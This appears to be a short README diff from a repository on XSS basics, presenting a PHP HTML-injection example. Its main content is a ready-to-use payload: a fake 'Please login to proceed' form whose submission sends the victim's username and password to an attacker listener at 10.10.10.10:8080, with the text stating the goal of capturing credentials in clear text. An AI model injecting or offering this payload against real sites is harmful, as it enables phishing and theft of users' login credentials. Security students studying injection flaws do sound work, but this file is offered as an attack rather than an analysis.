RoqueNight/XSS---Basics/README.md

 ```

 Basic PHP XSS HTML Injection Example

+Below code snippet can be used to perform a HTML injection attack to redirect the user to a custom login page.
+When the user submits his/her credentials , a request will be sent to the attacker's listener to capture the credentials in cear-text

 ```
 h3>Please login to proceed</h3> <form action=http://10.10.10.10:8080>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br>